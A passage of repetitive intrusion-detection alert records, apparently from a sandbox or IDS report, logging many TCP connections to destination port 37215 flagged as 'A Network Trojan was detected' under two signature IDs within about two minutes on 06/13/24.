              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488274
              SID:2835222
              Source Port:35346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257463
              SID:2829579
              Source Port:42142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823415
              SID:2835222
              Source Port:42454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153558
              SID:2835222
              Source Port:40978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.969577
              SID:2829579
              Source Port:33936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972211
              SID:2829579
              Source Port:59332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872742
              SID:2835222
              Source Port:45556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940403
              SID:2829579
              Source Port:47102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266241
              SID:2835222
              Source Port:39360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221374
              SID:2829579
              Source Port:59254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991598
              SID:2835222
              Source Port:49326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.023852
              SID:2835222
              Source Port:43418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025677
              SID:2835222
              Source Port:33888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502751
              SID:2835222
              Source Port:58192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028125
              SID:2835222
              Source Port:53050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.073881
              SID:2829579
              Source Port:40624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374411
              SID:2835222
              Source Port:60930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.680468
              SID:2829579
              Source Port:53736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211962
              SID:2829579
              Source Port:42530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214577
              SID:2829579
              Source Port:60520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729304
              SID:2829579
              Source Port:57796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197633
              SID:2835222
              Source Port:50224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153884
              SID:2835222
              Source Port:41196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169384
              SID:2829579
              Source Port:34120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263396
              SID:2835222
              Source Port:52002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657575
              SID:2835222
              Source Port:47864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.785128
              SID:2829579
              Source Port:41406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670142
              SID:2829579
              Source Port:59048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552256
              SID:2829579
              Source Port:39790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155295
              SID:2835222
              Source Port:46710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782429
              SID:2829579
              Source Port:49704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.417726
              SID:2835222
              Source Port:46682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.084873
              SID:2835222
              Source Port:39046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.556321
              SID:2829579
              Source Port:58756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988819
              SID:2835222
              Source Port:54330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320154
              SID:2829579
              Source Port:54602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238906
              SID:2829579
              Source Port:35186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614938
              SID:2835222
              Source Port:56210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213920
              SID:2829579
              Source Port:35032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093228
              SID:2835222
              Source Port:50792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181075
              SID:2829579
              Source Port:32974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076033
              SID:2829579
              Source Port:52126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321399
              SID:2835222
              Source Port:60366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373392
              SID:2835222
              Source Port:47108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708504
              SID:2829579
              Source Port:55058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248205
              SID:2835222
              Source Port:57958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990049
              SID:2829579
              Source Port:46188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564532
              SID:2829579
              Source Port:53750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422916
              SID:2829579
              Source Port:56190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087368
              SID:2829579
              Source Port:38184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358553
              SID:2829579
              Source Port:38566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127443
              SID:2835222
              Source Port:35028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.526099
              SID:2835222
              Source Port:45990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657897
              SID:2829579
              Source Port:41254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868962
              SID:2829579
              Source Port:50328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.024653
              SID:2829579
              Source Port:55836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.046876
              SID:2835222
              Source Port:54754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108990
              SID:2835222
              Source Port:33172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758666
              SID:2835222
              Source Port:47174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159923
              SID:2829579
              Source Port:37982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308395
              SID:2829579
              Source Port:50830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695271
              SID:2835222
              Source Port:59128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.242087
              SID:2835222
              Source Port:50916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888071
              SID:2835222
              Source Port:34920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253844
              SID:2829579
              Source Port:58754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257316
              SID:2829579
              Source Port:49116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076411
              SID:2835222
              Source Port:39588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.617545
              SID:2829579
              Source Port:45062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274009
              SID:2835222
              Source Port:50340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308266
              SID:2829579
              Source Port:40542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277236
              SID:2835222
              Source Port:35942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092274
              SID:2835222
              Source Port:47336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.452819
              SID:2835222
              Source Port:35700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027041
              SID:2829579
              Source Port:32876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506753
              SID:2829579
              Source Port:34204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675331
              SID:2829579
              Source Port:55406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197572
              SID:2835222
              Source Port:56970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.371255
              SID:2835222
              Source Port:48734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996237
              SID:2835222
              Source Port:35608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265403
              SID:2835222
              Source Port:36488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676431
              SID:2835222
              Source Port:40462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160861
              SID:2829579
              Source Port:60374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224805
              SID:2835222
              Source Port:35198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320618
              SID:2829579
              Source Port:47936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.504214
              SID:2829579
              Source Port:57224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099253
              SID:2829579
              Source Port:37262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758459
              SID:2835222
              Source Port:50982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707910
              SID:2835222
              Source Port:42306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.175516
              SID:2835222
              Source Port:37798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672785
              SID:2835222
              Source Port:38920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174412
              SID:2835222
              Source Port:52060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524810
              SID:2835222
              Source Port:40422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378269
              SID:2829579
              Source Port:60502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.304365
              SID:2829579
              Source Port:46594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.246855
              SID:2835222
              Source Port:38766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889368
              SID:2829579
              Source Port:36598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.379641
              SID:2835222
              Source Port:35718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.680592
              SID:2835222
              Source Port:46150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.219925
              SID:2835222
              Source Port:43378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043948
              SID:2835222
              Source Port:36524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.299168
              SID:2835222
              Source Port:58700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091644
              SID:2835222
              Source Port:42580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552801
              SID:2829579
              Source Port:54618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223730
              SID:2829579
              Source Port:39550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613901
              SID:2835222
              Source Port:39216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695790
              SID:2829579
              Source Port:47232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231598
              SID:2835222
              Source Port:51942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.101674
              SID:2835222
              Source Port:54606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.147906
              SID:2829579
              Source Port:39586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217314
              SID:2835222
              Source Port:38368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696858
              SID:2835222
              Source Port:49788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731728
              SID:2829579
              Source Port:50228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.126249
              SID:2835222
              Source Port:35238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026232
              SID:2829579
              Source Port:54204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656806
              SID:2829579
              Source Port:35858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.479965
              SID:2829579
              Source Port:53218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567878
              SID:2829579
              Source Port:54542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.671627
              SID:2829579
              Source Port:49414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316860
              SID:2829579
              Source Port:48936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440748
              SID:2829579
              Source Port:42888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697010
              SID:2835222
              Source Port:48060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871374
              SID:2835222
              Source Port:36590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377769
              SID:2829579
              Source Port:39998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868549
              SID:2835222
              Source Port:45276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214258
              SID:2829579
              Source Port:44104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610847
              SID:2835222
              Source Port:50656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273059
              SID:2829579
              Source Port:37910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477433
              SID:2829579
              Source Port:44464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045092
              SID:2829579
              Source Port:48144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176756
              SID:2829579
              Source Port:36974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420033
              SID:2835222
              Source Port:53856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.750646
              SID:2829579
              Source Port:60800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451207
              SID:2829579
              Source Port:49174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.303881
              SID:2829579
              Source Port:45520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943286
              SID:2829579
              Source Port:52936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177336
              SID:2829579
              Source Port:56514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.759231
              SID:2829579
              Source Port:53962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124604
              SID:2829579
              Source Port:37404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839924
              SID:2835222
              Source Port:47920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555808
              SID:2829579
              Source Port:44234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488691
              SID:2835222
              Source Port:43838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731171
              SID:2829579
              Source Port:54704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803694
              SID:2829579
              Source Port:53298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027624
              SID:2835222
              Source Port:56252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127030
              SID:2835222
              Source Port:34788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170484
              SID:2829579
              Source Port:36306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.930821
              SID:2829579
              Source Port:46824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175929
              SID:2829579
              Source Port:59254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654361
              SID:2829579
              Source Port:51042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228070
              SID:2835222
              Source Port:47768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.017400
              SID:2829579
              Source Port:41322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377016
              SID:2829579
              Source Port:34686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408659
              SID:2835222
              Source Port:51148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.628775
              SID:2829579
              Source Port:38360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350703
              SID:2835222
              Source Port:52592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377668
              SID:2829579
              Source Port:35248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027794
              SID:2835222
              Source Port:37140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.976751
              SID:2829579
              Source Port:60102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994247
              SID:2829579
              Source Port:39124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631030
              SID:2829579
              Source Port:46948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377509
              SID:2829579
              Source Port:43576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405955
              SID:2835222
              Source Port:43482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212525
              SID:2835222
              Source Port:52574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.093759
              SID:2835222
              Source Port:39618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.212712
              SID:2835222
              Source Port:56612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551584
              SID:2829579
              Source Port:57074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.304327
              SID:2835222
              Source Port:46752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301312
              SID:2829579
              Source Port:32860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344952
              SID:2835222
              Source Port:55784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992050
              SID:2829579
              Source Port:37360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.549866
              SID:2835222
              Source Port:46880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486183
              SID:2835222
              Source Port:50030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752985
              SID:2835222
              Source Port:50772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418804
              SID:2835222
              Source Port:52346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724372
              SID:2835222
              Source Port:40480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488946
              SID:2835222
              Source Port:45926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823878
              SID:2829579
              Source Port:44426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227384
              SID:2835222
              Source Port:52002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503880
              SID:2835222
              Source Port:54428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257762
              SID:2829579
              Source Port:47794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568143
              SID:2829579
              Source Port:44870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275469
              SID:2835222
              Source Port:46608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224287
              SID:2835222
              Source Port:37012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422769
              SID:2835222
              Source Port:50406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824419
              SID:2829579
              Source Port:56090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359597
              SID:2835222
              Source Port:33804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264161
              SID:2835222
              Source Port:58100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660758
              SID:2829579
              Source Port:43900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264123
              SID:2835222
              Source Port:45364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273876
              SID:2835222
              Source Port:52478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708386
              SID:2829579
              Source Port:59430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993193
              SID:2835222
              Source Port:47540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943799
              SID:2829579
              Source Port:40854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885571
              SID:2835222
              Source Port:45632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824583
              SID:2829579
              Source Port:34666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014367
              SID:2835222
              Source Port:41042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670571
              SID:2835222
              Source Port:44422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
